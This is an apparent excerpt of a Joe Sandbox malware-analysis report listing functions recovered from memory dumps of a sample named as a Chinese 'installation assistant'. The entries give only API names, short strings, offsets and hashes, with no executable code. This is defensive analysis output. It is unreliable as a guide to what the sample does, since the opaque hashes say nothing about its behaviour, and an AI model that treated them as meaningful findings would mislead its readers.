                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: 0|J$`)L
                                                                                                                • API String ID: 3519838083-117937767
                                                                                                                • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                                                                                • Instruction ID: 5ad0498e0ff9ebb70dd705cca7bafac10d3b3a11235aef4c2fd670319d675d5d
                                                                                                                • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                                                                                • Instruction Fuzzy Hash: 4841A371601B46DFCB168FA0C4947EABBE6FF69208F00442EE55A97B10CB71E945CB51
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldiv
                                                                                                                • String ID: 3333
                                                                                                                • API String ID: 3732870572-2924271548
                                                                                                                • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                                                                                                • Instruction ID: c3af1d911ed99afba8ba0d6da9fc3635ab86bc9af0235826f39ebbd3c8602c7a
                                                                                                                • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                                                                                                • Instruction Fuzzy Hash: 672197B0900704AFD720CFB98884B5BBAFDEF98714F50891EE146D7B40D770E9888B65
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: #$4qJ
                                                                                                                • API String ID: 3519838083-3965466581
                                                                                                                • Opcode ID: 84a8eb9074b6f9089a1fd02d6bcb4d7259a4313f9f2765f71615d484bdca8079
                                                                                                                • Instruction ID: acc71f56c6f921bbd360453ed0f41fabdecb69ccca51f24c6a10a41ab9bd8d5a
                                                                                                                • Opcode Fuzzy Hash: 84a8eb9074b6f9089a1fd02d6bcb4d7259a4313f9f2765f71615d484bdca8079
                                                                                                                • Instruction Fuzzy Hash: 9431AB35A04618DFDB10DF65C860AEE73B9AF55B18F068198E811B7B50CB30FD45CB90
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: @$LuJ
                                                                                                                • API String ID: 3519838083-205571748
                                                                                                                • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                                                                                • Instruction ID: bf302abe06f895ce6f0dcf7888a78779dc419780baea2b438e697a94a29ea051
                                                                                                                • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                                                                                • Instruction Fuzzy Hash: 20016D72E01609DACB10DFA984805AFF7B4FF69744F40C42EE569F3A40C334AA05CB99
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: @$xMJ
                                                                                                                • API String ID: 3519838083-951924499
                                                                                                                • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                                                                                                • Instruction ID: 2b1ee4bc6713c34d9656a438a226f3c4cc709c16e7e1946cd9b5217b58a8cca5
                                                                                                                • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                                                                                                • Instruction Fuzzy Hash: 22113971A01209EBCB00CFD9C4905AFB7B4FF69308B50C86EE469E7A40D734DA45CB95
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: p/K$J
                                                                                                                • API String ID: 3519838083-2069324279
                                                                                                                • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                                                                                                • Instruction ID: 68a560bea433f7446d68d660d97e5072b4d8f2dcda06f06d0ef1ef13d64cc68e
                                                                                                                • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                                                                                                • Instruction Fuzzy Hash: 5501BCB2A017519FD724CF58D6043AAF7F8EF51719F10C85EA092A3B40C7F8A9488BA4
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9E8FCC
                                                                                                                  • Part of subcall function 6C9E84D1: __EH_prolog.LIBCMT ref: 6C9E84D6
                                                                                                                  • Part of subcall function 6C9E714B: __EH_prolog.LIBCMT ref: 6C9E7150
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
• Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: J$0J
                                                                                                                • API String ID: 3519838083-2882003284
                                                                                                                • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                                                                                                • Instruction ID: 1726090476934084088eae36961561e65932e36a447757e01728b019545ef3c5
                                                                                                                • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                                                                                                • Instruction Fuzzy Hash: 2D01B3B1804B51CEC325CF56C5A468AFBE0BF25704F90C95EC4A657B51E7B8A508CB68
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6CA09439
                                                                                                                  • Part of subcall function 6CA094BA: __EH_prolog.LIBCMT ref: 6CA094BF
                                                                                                                  • Part of subcall function 6C9EB22B: __EH_prolog.LIBCMT ref: 6C9EB230
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
• Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: D.K$T.K
                                                                                                                • API String ID: 3519838083-2437000251
                                                                                                                • Opcode ID: 4bf8c15ffd7a86929b4665866baf81e9eeb815ebced635067bbf52e837154634
                                                                                                                • Instruction ID: de0982aa736ee48be0d09eae3aaf6b1ff691df674a78b40f80594a40b2126eca
                                                                                                                • Opcode Fuzzy Hash: 4bf8c15ffd7a86929b4665866baf81e9eeb815ebced635067bbf52e837154634
                                                                                                                • Instruction Fuzzy Hash: DB012C70911751CFC725CF69C6142DABBF4AF29708F00C91E80AA97B40E7B8AA48CB95
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
• Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: 8)L$8rJ
                                                                                                                • API String ID: 3519838083-896068166
                                                                                                                • Opcode ID: 31b7b83379da487e0b0fee470bf6f7791c36dd68afdddb73284a070326b97c38
                                                                                                                • Instruction ID: bc9d15173ad0014651cff1e31253060cf2dda1c186e940ae38325659171766bc
                                                                                                                • Opcode Fuzzy Hash: 31b7b83379da487e0b0fee470bf6f7791c36dd68afdddb73284a070326b97c38
                                                                                                                • Instruction Fuzzy Hash: BCF03A7AA04114EFC701CF98D949ADEBBF8FF46355F14806AF405A7211C7B8DA04CBA5
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9E23F9
                                                                                                                  • Part of subcall function 6C9E2320: __EH_prolog.LIBCMT ref: 6C9E2325
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
• Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: `)L$|{J
                                                                                                                • API String ID: 3519838083-2198066115
                                                                                                                • Opcode ID: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                                                                                                                • Instruction ID: 421682b52329097cbd21b0e7997e607a734ecf213bef24830ae944be8d7d0bce
                                                                                                                • Opcode Fuzzy Hash: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                                                                                                                • Instruction Fuzzy Hash: 8EF08272610414FFCB069F94DC04BDE7BA9FF69714F00802AF50596650CBB5AA14CB94
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
• Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologctype
                                                                                                                • String ID: <oJ
                                                                                                                • API String ID: 3037903784-2791053824
                                                                                                                • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                                                                                                • Instruction ID: 556370bf7b3a6c6d56d4fe65192e9b36b440e95207cc20346bcaec3d0aea5678
                                                                                                                • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                                                                                                • Instruction Fuzzy Hash: F6E0E532A01510AFD7089F48D810BDEF7B8EF54B18F12405FA01163B42CBB1F90886C4
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
• Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologctype
                                                                                                                • String ID: \~J
                                                                                                                • API String ID: 3037903784-3176329776
                                                                                                                • Opcode ID: 46757733936a42b96b936dd1dab949ec9d96d52f22713a54e894f9e80fe70f1d
                                                                                                                • Instruction ID: 155a011aa3b230506b28587f069503ff355d96d2b23ec95a064a463f32ff4621
                                                                                                                • Opcode Fuzzy Hash: 46757733936a42b96b936dd1dab949ec9d96d52f22713a54e894f9e80fe70f1d
                                                                                                                • Instruction Fuzzy Hash: 92E06D32B055219BDB269F48E810BDEF3A8EF68B19F10815EE411A7A51DBB1EC049690
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
• Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologctype
                                                                                                                • String ID: |zJ
                                                                                                                • API String ID: 3037903784-3782439380
                                                                                                                • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                                                                                                • Instruction ID: 78864a2fa9af7f277f8a5cd3df7f6d17eb0221fc83aa1a718584b7b0c87115f6
                                                                                                                • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                                                                                                • Instruction Fuzzy Hash: 5DE065726055209BE7158F49D8007DEF3A8FF79B14F10405F9413A7B42CBB1E8048785
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9E70E0
                                                                                                                  • Part of subcall function 6C9E714B: __EH_prolog.LIBCMT ref: 6C9E7150
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
• Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: J$0J
                                                                                                                • API String ID: 3519838083-2882003284
                                                                                                                • Opcode ID: 235f570c22735095cf226f139ec23b8166c83fec4b7bd0089cfa702e7a6a385e
                                                                                                                • Instruction ID: 08538f6d0e77834cb69a1d8d22dcda763ec8c65693fb98790846b7a5250ef344
                                                                                                                • Opcode Fuzzy Hash: 235f570c22735095cf226f139ec23b8166c83fec4b7bd0089cfa702e7a6a385e
                                                                                                                • Instruction Fuzzy Hash: 03F0C4B0901B51CFC725DF59D91428ABBF0FB16704B50C91FC0AA97B10D7B8A548CBA8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
• Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @ K$DJ$T)K$X/K
                                                                                                                • API String ID: 0-3815299647
                                                                                                                • Opcode ID: dac98d89fb1dd2bd8a0dcac61504098bca9fe61148d739192528eb0bc1c541c2
                                                                                                                • Instruction ID: 2f7d4bdf2f70877908391738170082c36f5081bc753c29fd8488a1efbd3dbaf4
                                                                                                                • Opcode Fuzzy Hash: dac98d89fb1dd2bd8a0dcac61504098bca9fe61148d739192528eb0bc1c541c2
                                                                                                                • Instruction Fuzzy Hash: F4912632F043459BCB00DF64E4907EE73B2AF6538DF144819C8666BB89CB75E98AC751
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
• Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: D)K$H)K$P)K$T)K
                                                                                                                • API String ID: 0-2262112463
                                                                                                                • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                                                                                                • Instruction ID: 5d33486995bd4a2527a0ca1cb58cf4712dbd729f825658896e4d49a8dfbb6882
                                                                                                                • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                                                                                                • Instruction Fuzzy Hash: CF51F330A043499BCF04CF94E844AEEB771AF3439CF14415AEC1567A85DB71E99ACB50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
• Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (?K$8?K$H?K$CK
                                                                                                                • API String ID: 0-3450752836
                                                                                                                • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                                                                                                • Instruction ID: f6401f8a0c65234805ad59cd8e69d682f69743a3a0b368e7ad52bde930f74807
                                                                                                                • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                                                                                                • Instruction Fuzzy Hash: E4F03AB06017109FC320CF06D64869BFBF4EB4171AF50C91EE49A9BA40D3BCA54C8FA9
Strings
Memory Dump Source
• Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
• Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
Similarity
• API ID:
• String ID: 00K$@0K$P0K$`0K
• API String ID: 0-1070766156
• Opcode ID: 7efb1c77604c1d1a2dcd35be8e9d5171401199da8c632a149feb581716eb9edd
• Instruction ID: cc08c49e7cab151d94aeeb036fe5aa8110f11b29cf5188a6292b857041db77c5
• Opcode Fuzzy Hash: 7efb1c77604c1d1a2dcd35be8e9d5171401199da8c632a149feb581716eb9edd
• Instruction Fuzzy Hash: 2DF03FB14152408FD348DF1A9598A82BFE0AF95319B56C1DED0184F276C3B9CA48CFA8